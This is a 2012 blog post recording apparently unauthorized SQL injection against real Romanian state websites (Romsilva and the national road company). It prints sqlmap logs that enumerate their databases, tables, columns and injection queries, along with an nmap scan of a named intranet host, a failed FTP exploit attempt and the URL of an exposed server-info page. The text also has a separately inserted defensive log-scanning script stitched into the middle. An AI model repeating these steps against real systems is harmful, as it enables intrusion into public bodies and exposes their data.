Regia Nationala a Padurilor – ROMSILVA – sql injection

24/02/2012 § 2 comments

The website of the Regia Nationala a Padurilor Romsilva is in the same "boat" as the one presented in the previous example on ajofmhd.ro.


co@linux:~/.sqlmap/output/www.rosilva.ro$ cat log
current database: 'site_rnp'

available databases [60]:
[*] act_ses
[*] adm
[*] agenti
[*] anunturi
[*] apo
[*] banci_zi
[*] buila
[*] cacti
[*] comert
[*] contnet
[*] contran
[*] contran_old
[*] directii
[*] e-docs
[*] Economic
[*] examene
[*] examentai
[*] factneinc
[*] fructe
[*] http
[*] information_schema
[*] inv
[*] legea1
[*] legea1old
[*] licitatii
[*] mapdr_legi
[*] mymarket
[*] mysql
[*] netacct
[*] netsilva
[*] opprim
[*] optoamna
[*] pastrav
[*] pepiniere
[*] pers
[*] postfix
[*] pp
[*] ProSilvaFondNet
[*] regenerare
[*] registru
[*] resumane
[*] rezerva
[*] rnp
[*] rnpeng
[*] rnpforum
[*] rosilva
[*] silv1eff
[*] silv1eff_2008
[*] silv1eff_save
[*] silv3
[*] silv4
[*] site_rnp
[*] site_rnp_en
[*] test
[*] test_licit
[*] tst
[*] vanatoare
[*] vpn
[*] WEBREPORTS
[*] xoops

Database: registru
[9 tables]
+-------------+
| dcom        |
| ddezv       |
| decon       |
| Destinatie  |
| dff         |
| dgen        |
| Documente1  |
| Provenienta |
| user        |
+-------------+

Database: registru
Table: Documente1
[8 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| Continut  | text         |
| DataInreg | date         |
| Dest      | varchar(40)  |
| IdInreg   | int(11)      |
| loc_inreg | varchar(20)  |
| NrDoc     | varchar(40)  |
| NrInreg   | int(11)      |
| Prov      | varchar(100) |
+-----------+--------------+

Database: site_rnp
[13 tables]
+-----------------+
| articole        |
| categorii       |
| comment         |
| contactds       |
| contactrnp      |
| declaratii      |
| directii        |
| functiidir      |
| multimedia      |
| news            |
| subcategorii    |
| subsubcategorii |
| unitati         |
+-----------------+

Database: site_rnp
Table: functiidir
[4 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| id      | int(5)       |
| nivel   | int(1)       |
| numefct | varchar(120) |
| ordine  | int(1)       |
+---------+--------------+

Database: site_rnp
Table: functiidir
[13 entries]
+----+
| id |
+----+
| 1  |
| 2  |
| 3  |
| 4  |
| 5  |
| 6  |
| 7  |
| 8  |
| 9  |
| 10 |
| 11 |
| 12 |
| 13 |
+----+

Database: site_rnp
Table: functiidir
[13 entries]
+----------+
| nume_fct |
+----------+
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
| NULL     |
+----------+

Database: site_rnp
Table: functiidir
[13 entries]
+--------+
| ordine |
+--------+
| NULL   |
| NULL   |
| NULL   |
| NULL   |
| NULL   |
| NULL   |
| 1      |
| 3      |
| 2      |
| NULL   |
| NULL   |
| NULL   |
| NULL   |
+--------+

Starting Nmap 5.00 ( http://nmap.org ) at 2012-02-23 22:30 CET
Interesting ports on intranet.rosilva.ro (86.34.169.35):
Not shown: 835 closed ports, 160 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     (Generally vsftp or WU-FTPD)
25/tcp   open  smtp    Sendmail 8.13.8/8.13.8
53/tcp   open  domain
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
3306/tcp open  mysql   MySQL 5.0.77
Service Info: Host: rosilva.rosilva.ro; OS: Unix

[*] Banner: 220 AVETI GRIJA CE SCRIETI P'ACILEA
[*] USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

And the best part of all was that banner, "AVETI GRIJA CE SCRIETI P'ACILEA" ("watch what you type around here") :))) :)) :))

The Compania de autostrazi si drumuri nationale Romania, http://www.cnadnr.ro, is in the same situation.

web server operating system: Linux Fedora
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[09:05:53] [INFO] fetching current database
[09:05:53] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[09:05:53] [INFO] retrieved: cnadnr
[09:07:45] [INFO] performed 48 queries in 111 seconds
current database: 'cnadnr'

[09:07:45] [INFO] Fetched data logged to text files under '/home/co/.sqlmap/output/www.cnadnr.ro'

[*] shutting down at: 09:07:45

[09:08:26] [INFO] testing connection to the target url
[09:08:29] [INFO] testing if the url is stable, wait a few seconds
[09:08:35] [INFO] url is stable
[09:08:35] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[09:08:40] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[09:08:40] [INFO] testing if GET parameter 'idg' is dynamic
[09:08:42] [INFO] confirming that GET parameter 'idg' is dynamic
[09:08:45] [INFO] GET parameter 'idg' is dynamic
[09:08:45] [INFO] testing sql injection on GET parameter 'idg' with 0 parenthesis
[09:08:45] [INFO] testing unescaped numeric injection on GET parameter 'idg'
[09:08:50] [INFO] confirming unescaped numeric injection on GET parameter 'idg'
[09:08:52] [INFO] GET parameter 'idg' is unescaped numeric injectable with 0 parenthesis
[09:08:52] [INFO] testing for parenthesis on injectable parameter
[09:08:58] [INFO] the injectable parameter requires 0 parenthesis
[09:08:58] [INFO] testing MySQL
[09:09:02] [INFO] confirming MySQL
[09:09:06] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[09:09:06] [INFO] retrieved: 2
[09:09:37] [INFO] performed 13 queries in 31 seconds
[09:09:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[09:09:37] [INFO] fetching database names
[09:09:37] [INFO] fetching number of databases
[09:09:37] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA
[09:09:37] [INFO] retrieved: 3
[09:10:09] [INFO] performed 13 queries in 32 seconds
[09:10:09] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1
[09:10:09] [INFO] retrieved: information_schema
[09:17:03] [INFO] performed 132 queries in 413 seconds
[09:17:03] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1
[09:17:03] [INFO] retrieved: cnadnr
[09:19:21] [INFO] performed 48 queries in 137 seconds
[09:19:21] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 2, 1
[09:19:21] [INFO] retrieved: test
[09:20:38] [INFO] performed 34 queries in 76 seconds
available databases [3]:
[*] cnadnr
[*] information_schema
[*] test
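Added example (not code from the blog post): detection logic for the step the sqlmap log above records, where a GET parameter the application treats as an integer ('idg') accepts arbitrary text and is injectable. The injectable parameter is a defect in the application code rather than in the server packages, so the strict integer check is the server-side fix and the log scan is what a defender would run over access logs afterwards. The log lines, client addresses and the NUMERIC_PARAMS list are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines (not real traffic): the parameter
# name 'idg' mirrors the sqlmap log above; IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Feb/2012:09:08:40 +0100] "GET /index.php?idg=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2012:09:08:42 +0100] "GET /index.php?idg=12%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2012:09:08:45 +0100] "GET /index.php?idg=12%20AND%201%3D2 HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2012:09:09:06 +0100] "GET /index.php?idg=12%20AND%20ORD(MID((SELECT%20DATABASE()),1,1))%3E64 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Feb/2012:09:10:00 +0100] "GET /index.php?idg=7 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

# client, timestamp, method, target, status, response size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Parameters the application uses as integers (hypothetical list for this site).
NUMERIC_PARAMS = {"idg"}
SQL_TOKEN_RE = re.compile(r"\b(AND|OR|SELECT|UNION|ORD|MID|SUBSTR|SLEEP|BENCHMARK)\b", re.I)

def is_strict_int(value: str) -> bool:
    """Server-side fix for an 'unescaped numeric' parameter: accept only an
    optional sign and ASCII digits, then bind the integer instead of interpolating it."""
    return re.fullmatch(r"-?[0-9]+", value) is not None

def suspicious_requests(log_text: str):
    """Yield (client, param, decoded_value, reason, size) for every request whose
    integer parameter carries anything but an integer."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status, size = m.groups()
        for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
            if name not in NUMERIC_PARAMS:
                continue
            for val in values:  # parse_qs already percent-decodes
                if is_strict_int(val):
                    continue
                reason = "sql-tokens" if SQL_TOKEN_RE.search(val) else "non-numeric"
                yield (client, name, val, reason, int(size))

def clients_by_hits(log_text: str, threshold: int = 2):
    """Clients with at least `threshold` flagged requests. Boolean-based blind
    extraction (48 queries for one 6-character name in the log above) repeats the
    pattern many times, with sizes alternating between the 'true' and 'false' page."""
    counts = {}
    for client, *_ in suspicious_requests(log_text):
        counts[client] = counts.get(client, 0) + 1
    return {c: n for c, n in counts.items() if n >= threshold}
```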

It seems that most servers belonging to large companies or to the state are beneath any criticism (a mess) on the security side, so I am not surprised that so many sites like the ones listed above get broken into. That is how the mass media ends up with a pile of wrong interpretations such as "site X was wiped out by hackers" or "it was hacked by Anonymous" and many others. As long as the server in question is kept up to date with the main programs (sshd, ftpd, mysql, apache, etc.), the risk of being hacked is extremely small, almost NULL.
And that holds until someone comes along and finds a bug, and later an exploit :)

http://www.rosilva.ro/i/poze/nfo.php - server info:
System Linux rosilva.rosilva.ro 2.6.18-274.el5 #1 SMP Fri Jul 22 04:43:29 EDT 2011 x86_64

Similar article: https://cosmen.wordpress.com/2012/02/22/ajofmhd-ro-down/
